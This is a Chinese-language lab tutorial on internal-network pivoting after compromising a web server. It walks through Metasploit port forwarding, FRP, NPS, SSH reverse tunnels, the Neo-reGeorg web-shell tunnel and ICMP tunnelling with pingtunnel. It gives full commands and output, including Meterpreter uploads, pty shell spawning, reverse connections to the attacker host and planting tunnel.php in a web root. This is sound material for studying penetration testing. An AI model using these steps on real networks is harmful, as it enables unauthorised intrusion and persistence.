MSF内网穿透之端口转发
一、简介
1、介绍
- 此文章接的MSF内网穿透写的
- 如果不了解可以先去看看
2、丑陋的拓扑图
二、MSF端口转发
1、进入WEB服务器
因为我想本机也想可以访问到win2003的3389端口,所以我们要用到端口映射
#查看sessions
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/linux root @ 192.168.88.132 192.168.88.141:4444 -> 192.168.88.132:49414 (192.168.88.132)
#进入WEB服务器的session
msf6 > sessions 2
[*] Starting interaction with 2...
#把win2003的3389映射到kali的13389端口
meterpreter > portfwd add -l 13389 -r 10.0.0.3 -p 3389
[*] Forward TCP relay created: (local) :13389 -> (remote) 10.0.0.3:3389
2、检查kali端口开放
┌──(sword?kali-3)-[~]
└─$ netstat -antp |grep 13389
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:13389 0.0.0.0:* LISTEN -
tcp 0 0 192.168.88.141:13389 192.168.88.1:63001 ESTABLISHED -
2、本机连接
3、连接成功
这个只能映射到
KALi
上
三、FRP
1、FRP下载
- 下载地址:
https://github.com/fatedier/frp/releases/tag/v0.52.3
- 中文文档:
https://github.com/fatedier/frp/blob/dev/README_zh.md
温馨提示:
如果你的攻击机是Linux,跳板机是Windows,那么你就要下载一个Linux的还要下载一个windows版本的
如果两台都是Linux就直接下载Linux的就行了
2、工具安装
这是我新开的会话窗口
3、修改配置文件
#管理端口为7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frps.toml
bindPort = 7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frpc.toml
#跳板机IP
serverAddr = "192.168.88.132"
#跳板机端口
serverPort = 7000
[[proxies]]
#名字
name = "web-tcp"
#使用的协议
type = "tcp"
#本地地址
localIP = "127.0.0.1"
#本地端口
localPort = 1000
#跳板机开启的隧道端口
remotePort = 2000
7000是指:FRP连接的端口
1000是指:KALI和跳板机连接隧道开启的端口
2000是指:跳板机和KALI开启的端口
4、上传FRP
#上传frps
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64/frps
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Uploaded -1.00 B of 16.01 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Uploaded -1.00 B of 16.01 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Uploaded -1.00 B of 16.01 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64/frps -> frps
[*] Completed : /home/sword/frp_0.52.3_linux_amd64/frps -> frps
#上传配置文件
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64/frps.toml
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64/frps.toml -> frps.toml
[*] Uploaded -1.00 B of 16.00 B (-6.25%): /home/sword/frp_0.52.3_linux_amd64/frps.toml -> frps.toml
[*] Completed : /home/sword/frp_0.52.3_linux_amd64/frps.toml -> frps.toml
#进入bash
meterpreter > shell
Process 3607 created.
Channel 3 created.
#使用python开启bash
python -c "import pty;pty.spawn('/bin/bash')"
#赋予执行权限
[root@CentOS-2 ~]# chmod +x frps
chmod +x frps
#在后台启用
[root@CentOS-2 ~]# ./frps -c frps.toml &
./frps -c frps.toml &
[1] 3623
[root@CentOS-2 ~]# 2023/11/08 20:18:30 [I] [root.go:102] frps uses config file: frps.toml
2023/11/08 20:18:30 [I] [service.go:200] frps tcp listen on 0.0.0.0:7000
2023/11/08 20:18:30 [I] [root.go:111] frps started successfully
在kali上运行FRP,建立隧道
┌──(root?kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# ls
LICENSE frpc frpc.toml frps frps.toml
#后台运行
┌──(root?kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# ./frpc -c frpc.toml &
[1] 26270
2023/11/08 20:21:50 [I] [root.go:139] start frpc service for config file [frpc.toml]
2023/11/08 20:21:50 [I] [service.go:299] [c89df2cf86f29c05] login to server success, get run id [c89df2cf86f29c05]
2023/11/08 20:21:50 [I] [proxy_manager.go:156] [c89df2cf86f29c05] proxy added: [web-tcp]
2023/11/08 20:21:50 [I] [control.go:173] [c89df2cf86f29c05] [web-tcp] start proxy success
5、kali开启http服务
#开启http服务
┌──(root㉿kali-3)-[/home/sword]
└─# pythpython -m http.server 1000
Serving HTTP on 0.0.0.0 port 1000 (http://0.0.0.0:1000/) ...
127.0.0.1 - - [08/Nov/2023 20:37:46] "GET / HTTP/1.1" 200 -
使用win2003访问
真实环境是win2003上有漏洞如拿到webshell
然后让他反弹到kali使用工具进行提权或者其他操作
四、NPS
1、FRP下载
- 下载地址:
https://github.com/ehang-io/nps/releases
- 中文文档:
https://github.com/ehang-io/nps/blob/master/README_zh.md
一个客户端一个服务端
2、工具安装
#解压
┌──(root?kali-3)-[/home/sword]
└─# tar -xf linux_amd64_server.tar.gz
#启用
┌──(root?kali-3)-[/home/sword]
└─# ./nps
2023/11/08 21:32:46.538 [I] [nps.go:202] the version of server is 0.26.10 ,allow client core version to be 0.26.0
2023/11/08 21:32:46.652 [I] [connection.go:36] server start, the bridge type is tcp, the bridge port is 8024
2023/11/08 21:32:46.653 [I] [server.go:200] tunnel task start mode:httpHostServer port 0
2023/11/08 21:32:46.653 [I] [connection.go:71] web management start, access port is 8080
2023/11/08 21:32:46.654 [I] [connection.go:62] start https listener, port is 443
2023/11/08 21:32:46.654 [I] [connection.go:53] start http listener, port is 80
访问8080端口,账户:admin,密码:123
3、创建客户端
就是Linux的IP(web服务器)
4、上传客户端到跳板机
#进入Linux
msf6 > sessions 1
[*] Starting interaction with 1...
#上传客户端
meterpreter > upload /home/sword/linux_amd64_client.tar.gz
[*] Uploading : /home/sword/linux_amd64_client.tar.gz -> linux_amd64_client.tar.gz
[*] Uploaded -1.00 B of 4.43 MiB (0.0%): /home/sword/linux_amd64_client.tar.gz -> linux_amd64_client.tar.gz
[*] Completed : /home/sword/linux_amd64_client.tar.gz -> linux_amd64_client.tar.gz
#进入bash
meterpreter > shell
Process 4022 created.
Channel 5 created.
#解压
tar -xf linux_amd64_client.tar.gz
#运行
./npc -server=192.168.88.141:8024 -vkey=bdo71ez62l2j9dta -type=tcp
2023/11/08 21:41:24.943 [I] [npc.go:231] the version of client is 0.26.10, the core version of client is 0.26.0
2023/11/08 21:41:24.944 [I] [client.go:72] Successful connection with server 192.168.88.141:8024
5、隧道建立
添加内网的http服务
表示成功上线
访问kali的8000端口,就是在访问Windows 2003的80端口
五、SSH端口映射
1、http端口映射
#进入bash
meterpreter > shell
Process 4100 created.
Channel 2 created.
#开启bash
python -c "import pty;pty.spawn('/bin/bash')"
#映射端口
[root@CentOS-2 ~]# ssh -CfNg -R 0.0.0.0:7000:10.0.0.3:80 sword@192.168.88.141
ssh -CfNg -R 0.0.0.0:7000:10.0.0.3:80 sword@192.168.88.141
sword@192.168.88.141's password: sword
2、访问kali的7000端口
只能使用kali来访问,因为它监听自己的7000端口
┌──(root?kali-3)-[/home/sword]
└─# netstat -antp |grep 7000
tcp 0 0 127.0.0.1:7000 0.0.0.0:* LISTEN 76805/sshd: sword
tcp6 0 0 ::1:7000 :::* LISTEN 76805/sshd: sword
六、Neo-reGeorg
1、工具下载
https://github.com/L-codes/Neo-reGeorg.git
https://github.com/L-codes/Neo-reGeorg
- 中文说明:
https://github.com/L-codes/Neo-reGeorg/blob/master/README.md
2、工具安装
#解压
┌──(root?kali-3)-[/home/sword]
└─# unzip Neo-reGeorg-master.zip
Archive: Neo-reGeorg-master.zip
015c557cffe26c7a5aa6a77e19493df2ceef252e
creating: Neo-reGeorg-master/
creating: Neo-reGeorg-master/.github/
creating: Neo-reGeorg-master/.github/ISSUE_TEMPLATE/
inflating: Neo-reGeorg-master/.github/ISSUE_TEMPLATE/bug_report.md
inflating: Neo-reGeorg-master/.github/ISSUE_TEMPLATE/#U9519#U8bef#U63d0#U4ea4.md
inflating: Neo-reGeorg-master/.gitignore
inflating: Neo-reGeorg-master/CHANGELOG-en.md
inflating: Neo-reGeorg-master/CHANGELOG.md
inflating: Neo-reGeorg-master/LICENSE
inflating: Neo-reGeorg-master/README-en.md
inflating: Neo-reGeorg-master/README.md
inflating: Neo-reGeorg-master/neoreg.py
creating: Neo-reGeorg-master/templates/
inflating: Neo-reGeorg-master/templates/NeoreGeorg.java
inflating: Neo-reGeorg-master/templates/tunnel.ashx
inflating: Neo-reGeorg-master/templates/tunnel.aspx
inflating: Neo-reGeorg-master/templates/tunnel.go
inflating: Neo-reGeorg-master/templates/tunnel.jsp
inflating: Neo-reGeorg-master/templates/tunnel.jspx
inflating: Neo-reGeorg-master/templates/tunnel.php
#进入文件夹
┌──(root?kali-3)-[/home/sword]
└─# cd Neo-reGeorg-master
#查看
┌──(root?kali-3)-[/home/sword/Neo-reGeorg-master]
└─# ls
CHANGELOG-en.md CHANGELOG.md LICENSE README-en.md README.md neoreg.py templates
3、生成脚本
#生成代理脚本密码是sword
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# python neoreg.py generate -k sword
[+] Mkdir a directory: neoreg_servers
[+] Create neoreg server files:
=> neoreg_servers/tunnel.ashx
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel.jsp
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.php
=> neoreg_servers/tunnel.go
4、上传脚本
#进入跳板机的session
msf6 > sessions 1
[*] Starting interaction with 1...
#上传代理脚本
meterpreter > upload /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php
[*] Uploading : /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php -> tunnel.php
[*] Uploaded -1.00 B of 5.67 KiB (-0.02%): /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php -> tunnel.php
[*] Completed : /home/sword/Neo-reGeorg-master/neoreg_servers/tunnel.php -> tunnel.php
#进入bash
meterpreter > shell
Process 1362 created.
Channel 3 created.
#移动到http服务目录下
mv tunnel.php /opt/lampp/htdocs/sundry
5、连接代理脚本
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# python neoreg.py -k sword -u http://192.168.88.132/sundry/tunnel.php -l 0.0.0.0 -p 1080
"$$$$$$'' 'M$ '$$$@m
:$$$$$$$$$$$$$$''$$$$'
'$' 'JZI'$$& $$$$'
'$$$ '$$$$
$$$$ J$$$$'
m$$$$ $$$$,
$$$$@ '$$$$_ Neo-reGeorg
'1t$$$$' '$$$$<
'$$$$$$$$$$' $$$$ version 5.1.0
'@$$$$' $$$$'
'$$$$ '$$$@
'z$$$$$$ @$$$
r$$$ $$|
'$$v c$$
'$$v $$v$$$$$$$$$#
$$x$$$$$$$$$twelve$$$@$'
@$$$@L ' '<@$$$$$$$$`
$$ '$$$
[ Github ] https://github.com/L-codes/Neo-reGeorg
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting SOCKS5 server [0.0.0.0:1080]
Tunnel at:
http://192.168.88.132/sundry/tunnel.php
+------------------------------------------------------------------------+
-l :指定主机(谁能访问代理)
-p:指这个代理开启需要动用的端口
-u:代表代理脚本的地址
-k:指制作这个脚本的约定密码
6、访问win2003的http服务
kali浏览器开启代理
直接访问Windows 2003
7、本机访问
需要使用代理插件,浏览器自带的那个代理不行
这里的141是kali的IP地址
七、贝锐花生壳
1、下载地址
https://hsk.oray.com/
2、介绍
- 因为需要实名认证,所以这里就不演示了
八、pingtunnel
1、ICMP协议
- 简单介绍:
https://www.rfc-editor.org/rfc/inline-errata/rfc792.html
- 下载地址:
https://github.com/esrrhs/pingtunnel
2、截图分析ICMP协议
request:请求包
reply:应答包
3、开启服务
#移动工具
┌──(root?kali-3)-[/home/sword]
└─# mv pingtunnel_linux_amd64.zip shell/
#进入目录
┌──(root?kali-3)-[/home/sword]
└─# cd shell
#解压
┌──(root?kali-3)-[/home/sword/shell]
└─# unzip pingtunnel_linux_amd64.zip
Archive: pingtunnel_linux_amd64.zip
inflating: pingtunnel
#查看
┌──(root?kali-3)-[/home/sword/shell]
└─# ls
pingtunnel pingtunnel_linux_amd64.zip windows.exe
#开启服务
┌──(root㉿kali-3)-[/home/sword/shell]
└─# ./pingtunnel -type server
4、跳板机启动工具
真实环境一个使用MSF,这里方便就直接使用了ssh
#解压
[root@CentOS-2 ~]# unzip pingtunnel_linux_amd64.zip
Archive: pingtunnel_linux_amd64.zip
inflating: pingtunnel
#启用服务
[root@CentOS-2 ~]# ./pingtunnel -type client -l :5555 -s 192.168.88.141 -t 192.168.88.141:1000 -tcp 1
-type client:类型为客户端
-l :5555:
-s 192.168.88.141:是指服务端(kali)
-t 192.168.88.141:1000:转给kali的1000端口
-tcp:把TCP协议交给ICMP封装
1:代表启动
5、开启kali的1000端口
因为跳板机会把数据交给1000端口,使用这里要开启的1000端口
┌──(root?kali-3)-[/home/sword]
└─# python -m http.server 1000
Serving HTTP on 0.0.0.0 port 1000 (http://0.0.0.0:1000/) ...
使用Windows2003访问
6、抓包分析
7、逻辑分析
- 内网访问跳板机的
5555
端口,都会转给kali的1000
端口
类型为客户端
-l :5555:
-s 192.168.88.141:是指服务端(kali)
-t 192.168.88.141:1000:转给kali的1000端口
-tcp:把TCP协议交给ICMP封装
1:代表启动